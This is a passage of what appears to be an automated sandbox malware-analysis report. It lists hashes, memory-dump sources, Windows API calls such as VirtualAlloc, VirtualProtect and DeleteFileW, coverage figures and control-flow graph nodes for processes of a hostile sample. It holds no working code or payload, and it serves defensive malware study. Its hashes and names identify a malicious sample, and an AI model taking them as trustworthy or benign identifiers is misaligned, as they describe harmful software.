                                                                                • Opcode ID: 4ccf89ded44e2bb0e7710520925f31abc24e10759ce6878f7d98a76aa8751f62
                                                                                • Instruction ID: df894e83f8de5de070c519e8326ce0398820bd062de4760a78c7640cbbc98099
                                                                                • Opcode Fuzzy Hash: 4ccf89ded44e2bb0e7710520925f31abc24e10759ce6878f7d98a76aa8751f62
                                                                                • Instruction Fuzzy Hash: 17117331B012158FCB22AFB9C4542EF7AF5EF48264B14A079D80AEB301E731D8418BD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 75e623bd40083617bd53bf66d5c3b21659062a0831fe9ab47997581df41b43bd
                                                                                • Instruction ID: 8486f2eef15c37184ef7b7200923d4ddda1fb632c1c2ff2f4fa28a3e161233ba
                                                                                • Opcode Fuzzy Hash: 75e623bd40083617bd53bf66d5c3b21659062a0831fe9ab47997581df41b43bd
                                                                                • Instruction Fuzzy Hash: 46018431B412148FCB22EFB984542EF77F6EF48264B10A479E80AEB201E735D8418BE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3211909982.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2e2d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction ID: 85c1dcfe01e78ade2efff203e9ff2d1ee6da881a51f23a7158f637f7fc4bc1fb
                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction Fuzzy Hash: E511D075544244CFCB15CF10C9C4B16BF62FB48318F28C6A9D94A4B662C33AD84ACF62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 568d71cfc645ee04b64bfd26b06b46a34bbbee458bba7feac3def56e2c6f5242
                                                                                • Instruction ID: 6c6026db242d069bd14bbf05ad281d0d7fd5efe45011a4167ba5d515308e421c
                                                                                • Opcode Fuzzy Hash: 568d71cfc645ee04b64bfd26b06b46a34bbbee458bba7feac3def56e2c6f5242
                                                                                • Instruction Fuzzy Hash: B801D631A001048BCB14EF95D984BCABBBAFF84314F54C174D80C5B29AD770E946CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 44778a29e4de140de4497d1671ab043566afbe5c5c4dad4e99be8c91e08f92f8
                                                                                • Instruction ID: 2e882f0b660a121e73ce1cf8260485e2cb16db9ce9dcdc2afe33047069d5a296
                                                                                • Opcode Fuzzy Hash: 44778a29e4de140de4497d1671ab043566afbe5c5c4dad4e99be8c91e08f92f8
                                                                                • Instruction Fuzzy Hash: 6601FF31A40109AFCB05EFB8F995A9D7BBAEF40304F5041B9D404AB255DB39AF1A8B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ee1817920b2f77317180e656702515855a0f873878071e8d2a84a177468539e
                                                                                • Instruction ID: 20cd9c6e73772f77a376b8e658ed7602963ba3a405261c47ba3fb0fafe0f70f2
                                                                                • Opcode Fuzzy Hash: 2ee1817920b2f77317180e656702515855a0f873878071e8d2a84a177468539e
                                                                                • Instruction Fuzzy Hash: 09012835B80204CFCB25DB78D858BAD7BB2EF88719F5040A9E4069B3A0CF34AD46CB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51aa931b67eb855d2b97e6136261c9eefd390cda49a4d94fcd99cfac018a96c0
                                                                                • Instruction ID: 32790152e1faf885156f1d274397118b649c6ffa02406a2b127091e3ee7ef8fc
                                                                                • Opcode Fuzzy Hash: 51aa931b67eb855d2b97e6136261c9eefd390cda49a4d94fcd99cfac018a96c0
                                                                                • Instruction Fuzzy Hash: BDF0B4B5940045AFDB05CBA8DC84EFBBBB8EBCA325B15C196E04887016C6349817C7B0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 503acc6acfa010aa43abca041027c88bc3d7daea271409e150b85ca377324ee7
                                                                                • Instruction ID: e294eb79e1c4f9e75b4d31a28fc93c75e8ec4c547fc19fd1e6398dfb4d8c5352
                                                                                • Opcode Fuzzy Hash: 503acc6acfa010aa43abca041027c88bc3d7daea271409e150b85ca377324ee7
                                                                                • Instruction Fuzzy Hash: 4DF0F633A451508BC7238BA498A01EE7BA1EE58235718A0E7D80ADF212D725D402CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e61e183dc0530fc028959bd7c654389c640031ddbc4a991c446ed99a79a25fb
                                                                                • Instruction ID: da9d3356dd5a519c8120c5795f888b01347494e64d49affaf045041e4e9fec57
                                                                                • Opcode Fuzzy Hash: 3e61e183dc0530fc028959bd7c654389c640031ddbc4a991c446ed99a79a25fb
                                                                                • Instruction Fuzzy Hash: 38F0C930D401099FCB05EFB8F98599D7BBAEF40304F5046B9D409AB264EB396F1ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                                                                • Instruction ID: ca115c23fbb6877b9662dc4e6334fb8bcd507082393493cc9588831e1162dc2d
                                                                                • Opcode Fuzzy Hash: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                                                                • Instruction Fuzzy Hash: 17C002363580508FC606A768E0644B977B6DFCA66932845AAE159CB762CE26A8029F44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 642a7aa0df6a1b72a510d2c53894cf898cbbf1ff50ce339079345b439131290d
                                                                                • Instruction ID: 3bf2b8c28080548a4e8be71bea9cee382c24f4448b1fb617838236871af4254f
                                                                                • Opcode Fuzzy Hash: 642a7aa0df6a1b72a510d2c53894cf898cbbf1ff50ce339079345b439131290d
                                                                                • Instruction Fuzzy Hash: 04B0923700010CAE8B01BB90E804C86BBADEB942407008062AA084A232DA22E668EBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:6.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0079BF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2326856367.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_790000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0079C993
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2326856367.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_790000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2325393437.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5cd000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2325393437.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5cd000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2340383107.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6430000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:14%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:146
                                                                                Total number of Limit Nodes:14

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0631FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0631580F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0631580F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02C972D8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3212730777.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c90000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0631E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 02C972D8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3212730777.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2c90000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0632D6BA), ref: 0632D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0632D6BA), ref: 0632D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250993111.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6320000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0631E0A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0631DBFC), ref: 0631DE36
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3250760567.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6310000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3211587661.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_141d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3211587661.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_141d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:5.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 24ebe98-24ebf19 VirtualProtect 430 24ebf1b-24ebf21 427->430 431 24ebf22-24ebf47 427->431 430->431
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 024EBF0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2408724325.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_24e0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 964 24ec928-24ec9a0 VirtualAlloc 967 24ec9a9-24ec9ce 964->967 968 24ec9a2-24ec9a8 964->968 968->967
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 024EC993
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2408724325.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_24e0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1151 a5d005-a5d042 1154 a5d0d3-a5d0da 1151->1154 1155 a5d048 1151->1155 1156 a5d04a-a5d056 1154->1156 1155->1156 1158 a5d05c-a5d07e 1156->1158 1159 a5d0df-a5d0e4 1156->1159 1160 a5d080-a5d09f call 24ec2e0 1158->1160 1161 a5d0e9-a5d0fe 1158->1161 1159->1158 1164 a5d0a3-a5d0b3 1160->1164 1165 a5d0b5-a5d0bd 1161->1165 1164->1165 1166 a5d10b 1164->1166 1167 a5d100-a5d109 1165->1167 1168 a5d0bf-a5d0d0 1165->1168 1167->1168
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2407527392.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a5d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1171 a5d030-a5d042 1172 a5d0d3-a5d0da 1171->1172 1173 a5d048 1171->1173 1174 a5d04a-a5d056 1172->1174 1173->1174 1176 a5d05c-a5d07e 1174->1176 1177 a5d0df-a5d0e4 1174->1177 1178 a5d080-a5d09f call 24ec2e0 1176->1178 1179 a5d0e9-a5d0fe 1176->1179 1177->1176 1182 a5d0a3-a5d0b3 1178->1182 1183 a5d0b5-a5d0bd 1179->1183 1182->1183 1184 a5d10b 1182->1184 1185 a5d100-a5d109 1183->1185 1186 a5d0bf-a5d0d0 1183->1186 1185->1186
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2407527392.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a5d000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:12.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:165
                                                                                Total number of Limit Nodes:13
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8116a3b4c7b1c5eedfa7f8aca0ac6c5b53a92bc13f2a3acfbceeb2ad9336976
                                                                                • Instruction ID: 40bf5e6fb65f70133ed0f2623877a317b09912aebfb769897d91a104854bf12d
